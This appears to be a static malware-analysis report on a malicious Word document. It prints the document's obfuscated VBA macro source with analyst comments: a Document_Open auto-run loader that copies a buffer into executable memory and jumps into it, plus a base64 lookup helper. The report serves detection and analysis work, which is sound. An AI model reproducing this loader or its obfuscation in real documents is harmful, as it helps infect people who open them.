Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b2fb7cbe5ddfc3bb…

MALICIOUS

Office (OLE)

Size: 195.5 KB (200,192 bytes) · Created: 2017-08-20 21:54:00 · Authoring application: Microsoft Office Word · First seen: 2017-09-14
MD5: 1398b3f402ff43e986af40e895d750ea SHA-1: 5d2928341807f3820529cbee2188b9709bbacf7c SHA-256: b2fb7cbe5ddfc3bbdac26a3197f135c2a89cb3697e3f297ba37382be2456f2e4
Risk Score: 70

Malware Insights

MITRE ATT&CK
T1059.005 (Command and Scripting Interpreter: Visual Basic) · T1566.001 (Phishing: Spearphishing Attachment)

The sample is an OLE document with a high slack anomaly and detected VBA macros, including a Document_Open macro. The decoded VBA (extracted as 'macros.bas') is heavily obfuscated with junk assignments, discarded Pmt() calls, dead `#If` branches and arithmetic-selector helpers. The live path is Document_Open → plaque → seminary: a string derived from a form control is passed through a helper that is not in the preview, and the resulting buffer's address, a size, and the constants -1, 4096 and 64 are handed to externally declared routines before a third routine is called with an offset into the returned address — a shape consistent with in-process allocation of executable memory, a copy of a decoded payload into it, and a jump to it (the Declare statements are not in the preview, so this is an inference to confirm). No URL, network API or shell invocation appears in the previewed code, so the 'download a second-stage payload' characterization is not supported by the visible listing; the executed buffer appears to be carried inside the document, and the 80 KB of unallocated OLE slack should be carved and examined independently. The presence of a Document_Open macro indicates an attempt to automatically execute code upon opening the document, characteristic of a phishing attachment.

Heuristics 4

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 200,192 bytes but its declared streams total only 119,337 bytes — 80,855 bytes (40%) live in unallocated sector slack. Unallocated slack is a well-known place to stash an encoded payload (in older, pre-macro exploit documents, XOR-encoded shellcode reached through a parser memory-corruption bug). Here the macro's buffer appears to originate from a form control rather than from the slack, so the slack region should be carved and inspected as a separate artifact.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim magnificat As Variant
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    These eight URLs are XML namespace identifiers (Adobe XMP, RDF, Dublin Core, Photoshop and DrawingML) of the kind carried in embedded-image metadata; they are not contact URLs and should not be treated as network indicators.
    • http://ns.adobe.com/xap/1.0/ — in document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — in document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ — in document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — in document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — in document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — in document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# — in document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6758 bytes
SHA-256: ec8f20fc62e08de1d58564c11a8b1339040b50ed2d4b2f23cc9e788346d7b43d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True





' Stage 1 of the loader chain (called from Document_Open). Obtains a string
' from a form control, hands it to seminary(), then calls an externally
' declared routine with an address 4240 bytes past the value seminary()
' returned. Most assignments below are never read (junk), and every bare
' `Pmt ...` statement discards the result of VBA's built-in payment function.
Sub plaque()
Dim cinematographer As Integer
Dim radio As Integer
' `modernization` carries a designer GUID base attribute later in this
' listing, so it is presumably a UserForm and `pothos` a control on it --
' confirm. Day(#12/5/2013#) is simply 5.
modernization.pothos.Value = Day(#12/5/2013#)
' A comparison, not a double assignment: varday gets (minstrelsy = "rote").
varday = minstrelsy = "rote"
bennettitis = "ajaia"
archaistic = aceration
sarcosome = "psephomancy"
bomber = "caconym"

anarhichas = bastnasite
schizoid = "melatonin"
Set exfoliation = modernization.pothos.SelectedItem
mildly = 43
newscast = 14579
cubitiere = 538782
 Pmt 0, mildly, 15373, 35015, 2

' Right(bulb, 7844) returns the whole name unless it exceeds 7844 characters.
bulb = exfoliation.Name
maneater = 7844
unassisted = Right(bulb, maneater)
' `ale.monarchies` is not in the previewed modules; whatever it returns is
' what seminary() later copies into memory (presumably a decoder -- confirm).
cheerless = ale.monarchies(unassisted)
extenuation = 2
insidious = 16422
ember = 389246
 Pmt 0, extenuation, 22606, 12626, 5

mangle = "scam"
prosy = "implicated"
' Both #If tests reduce to `0 < Win64` (Win64 is True/-1 or False/0), so the
' LongPtr branch appears never to compile and the Long branch always does --
' NOTE(review): confirm; if so the pointer math below is only 32-bit-coherent.
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim commisvoyageur As Variant
Dim montserratian As LongPtr
Dim handcuffs As LongPtr
Dim clairobscur As Long
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim amis As String
Dim handcuffs As Long
Dim analyticity As Variant
Dim montserratian As Long
#End If
helioscope = 34 - 21 - 13
undemonstrable = "antiinflammatory"
distemper = "flacourtia"
' 4096 -- never read afterwards.
scourer = 19 + 128 + 3949
catamenial = 1
guyana = 10399
parquetry = 439203
 Pmt 0, catamenial, 27187, 12482, 2

anacanthini = "pengo"
ataractic = upanishad
confrication = "nucleotide"
loaves = "jewfish"
gladdened = 24
scaliness = 18123
cherimoya = 168176
 Pmt 0, gladdened, 14101, 49769, 8

undisclosed = cheerless
grab = "percussion"
' seminary() returns the address its allocation call wrote back (see below).
montserratian = seminary(undisclosed)
grison = "orlon"
' Same dead/live #If pair as above; on the live branch
' secularized = 781 + 3459 = 4240.
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim catalepsy As String
Dim watercolor As LongPtr
Dim untrimmed As LongPtr
Dim aboral As LongPtr
secularized = 77 + 77 + 1910
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim watercolor As Long
argyranthemum = 126 + 8 + 647
Dim untrimmed As Long
Dim aboral As Long
secularized = argyranthemum + 3459

#End If
Dim catkin As Integer
Dim disseminate As String
watercolor = 0
' Address passed onward = seminary() result + 4240, i.e. an offset into the
' copied buffer (presumably the payload entry point -- confirm).
handcuffs = montserratian + secularized
' 201527 and 3500; aboral is not used afterwards.
untrimmed = 102 + 31 + 201394
aboral = 23 - 41 + 3518
' `elefants` is not declared in the previewed modules. Its third argument is
' the computed code address, so it is presumably the execution primitive --
' NOTE(review): identify the Declare in the full module set.
beating = elefants(untrimmed, watercolor, handcuffs)
envelop = 10 + 3
abkari = 11760 + 3
alleviation = 230210 + 8
 Pmt 0, envelop, 10426, 51697, 7

End Sub

' Memory-copy wrapper: copies `monkhood` bytes from address `sloganeering`
' to address `posession`. The copy itself is done by `bombinate`, whose
' Declare is not in the previewed modules; the five-argument shape with a
' leading -1 (the current-process pseudo-handle) is consistent with a
' WriteProcessMemory-style call -- NOTE(review): confirm against the full
' module set. The function result is never assigned; callers ignore it.
Function acknowledgment(posession, sloganeering, monkhood)
' samara(5); samara() yields 120 - 12 * arg on the branch that compiles.
vagons = samara(20 / 4)
' `vagons` is a runtime variable, but #If only sees conditional-compilation
' constants (undefined names read as Empty/0), so the first test reduces to
' `0 < 0` (dead) and the second always compiles -- NOTE(review): confirm.
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (vagons) Then
Dim camboose As Byte
Dim fatiguing As Byte
Dim contiguity As LongPtr
Dim ringaroundtherosy As LongPtr
Dim ratification As LongPtr
Dim incredulously As Byte
Dim polarization As LongPtr
Dim kittereen As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (vagons) Then
Dim ringaroundtherosy As Long
Dim austenite As String
Dim contiguity As Long
Dim soullessly As Long
Dim polarization As Long
Dim catalogued As Variant
Dim ratification As Long
Dim empirema As Integer
Dim kittereen As Long
Dim trogoniformes As Integer
Dim liquids As Variant
#End If
posy = "dismount"
cancan = "hamate"
' Destination address.
ringaroundtherosy = posession
' Byte count.
kittereen = monkhood
bacillariophyceae = Fix(441)
' Source address.
polarization = sloganeering
emanation = 100 + 8
diagrammatically = 38200 + 4
motet = 212380 + 1
 Pmt 0, emanation, 16319, 40766, 5

bacillariophyceae = Fix(101)
' -1
contiguity = 93 + 74 - 168
' `ratification` is never set before the call, so it is presumably an output
' parameter (e.g. bytes written) -- confirm from the Declare.
bombinate ByVal contiguity, ringaroundtherosy, polarization, kittereen, ratification
cancan = "libya"
End Function
' Auto-execute entry point: Word runs this when the document is opened.
' Its only effective action is the call to plaque(); every other line is junk.
Private Sub Document_Open()
Dim magnificat As Variant
Dim bills As Integer
ametropia = "stroll"
' `dubrovnik` is not defined in the previewed modules (Empty if undeclared).
preemption = dubrovnik
plaque
shakable = 30 + 8
cucurbit = 4140 + 8
insemination = 475350 + 1
' Result of VBA's built-in Pmt() discarded; no effect.
 Pmt 0, shakable, 5533, 43331, 2
End Sub
' Loader core: takes a string in `hindustan`, reads the address of its
' string data out of the Variant, obtains a fresh memory region via
' `carposporic`, copies 5883 bytes of the string into it and returns the
' region's address. `carposporic` is not declared in the previewed modules;
' its six arguments (-1 pseudo-handle, base passed by reference, 0, size 9290
' passed by reference, 4096 = MEM_COMMIT, 64 = PAGE_EXECUTE_READWRITE) match
' the shape of an NtAllocateVirtualMemory-style call -- NOTE(review): confirm.
Function seminary(hindustan)
Dim etymology As Byte
Dim fogyish As String
Dim federalists As Byte
Dim diggings As Variant
' As in plaque(), the LongPtr branch reduces to `0 < Win64` and appears dead;
' on the live branch flagellate = 37 + 71 - 104 = 4 (a 32-bit pointer size).
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim stupidity As Variant
Dim article As LongPtr
flagellate = 89 - 33 - 48
Dim justifier As LongPtr
Dim anaphoric As Integer
Dim fairandsquare As Byte
Dim penates As LongPtr
Dim helluo As Long
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim article As Long
flagellate = 37 + 71 - 104
Dim justifier As Long
Dim penates As Long
#End If
' Copy `flagellate` bytes from offset 8 of the VARIANT holding `hindustan`
' (the data union, i.e. the BSTR pointer) into `article`. On 64-bit Office a
' 4-byte copy would truncate the pointer, so the loader looks 32-bit only --
' NOTE(review): confirm.
alligator = VarPtr(article)
circumscribe = acknowledgment(alligator, VarPtr(hindustan) + 8, flagellate)
' Arguments for the allocation call: -1, 0, 0, 9290, 4096, 64.
jhilmil = 63 - 77 + 13
justifier = 0
ableness = 0
penates = 9290
parrotia = 74 - 12 + 4034
arcturus = 15 - 29 + 78
' `justifier` and `penates` are the only arguments not marked ByVal; if the
' Declare takes them by reference, `justifier` receives the region base.
seaside = carposporic(ByVal jhilmil, justifier, ByVal ableness, penates, ByVal parrotia, ByVal arcturus)
' Both names are undeclared at this scope (Empty), so these evaluate to 0 -- junk.
enforced = bacillariophyceae \ 95

enforced = tegucigalpa / 432

' 88 - 10 + 5805 = 5883 bytes from the string data into the new region.
acknowledgment justifier, article, 88 - 10 + 5805
redux = 40 + 2
libertine = 38080 + 7
itur = 362810 + 7
 Pmt 0, redux, 20584, 38258, 7

' Address of the copied buffer, consumed by plaque().
seminary = justifier
End Function


Attribute VB_Name = "modernization"
Attribute VB_Base = "0{65F4F1BC-40BA-49A8-B8C6-163CE2497F59}{162405D5-504B-4BFC-995A-EA1C8157FE2A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "mdtrs"


' Selector-driven arithmetic helper (an obfuscation idiom): `rajab` picks
' which operation is applied to `august` and `astrocyte`. The three selector
' expressions fold to 37, 47 and 55; any other selector leaves the result Empty.
Function unaware(august, astrocyte, rajab)
    Select Case rajab
        Case 37
            ' Integer division.
            unaware = august \ astrocyte
        Case 47
            ' Bitwise And.
            unaware = august And astrocyte
        Case 55
            ' Multiplication.
            unaware = august * astrocyte
    End Select
End Function

' Builds a 256-entry byte lookup table mapping the standard base64 alphabet
' to its 6-bit value: 'A'-'Z' -> 0..25, 'a'-'z' -> 26..51, '0'-'9' -> 52..61,
' '+' -> 62 and '/' -> 63. Each range loop also fills one slot past the
' alphabet ('[' -> 26, ':' -> 62, '{' -> 52), exactly as the original did;
' every other slot stays 0.
Function assignee()
    Dim table(255) As Byte
    Dim c As Integer
    ' 'A'..'Z' (and '[')
    For c = 65 To 91
        table(c) = c - 65
    Next c
    ' '0'..'9' (and ':')
    For c = 48 To 58
        table(c) = c + 4
    Next c
    ' 'a'..'z' (and '{')
    For c = 97 To 123
        table(c) = c - 71
    Next c
    ' '/' and '+'
    table(47) = 63
    table(43) = 62
    assignee = table
End Function
' Helper used only to seed the #If selector in acknowledgment(); returns
' 120 - 12 * netves on the branch that compiles (see note below).
Function samara(netves)
Dim windser As Integer
Dim velvet As Integer
' 12 * netves
fixoid = netves * 12
Dim sitroen As Variant
' 2 * netves
subway2 = netves * 2
Dim cowen() As Byte
' `netves` is a runtime argument, but inside #If it is an undefined
' conditional-compilation name and reads as 0, so the first test reduces to
' `20 < Win64` (dead) and the second to `Not (Win64 > 20)` (live) --
' NOTE(review): confirm.
#If (3 * 4 + netves) > (7 - 2 * 1) And (10 - netves * 2) * 2 < (Win64) Then
velvet = subway2
#End If
#If (3 * 4 + netves) > (7 - 2 * 1) And Not (Win64) > (10 - netves * 2) * 2 Then
velvet = (120 - fixoid)
#End If
' Never read.
subway3 = subway2 + velvet
samara = velvet
End Function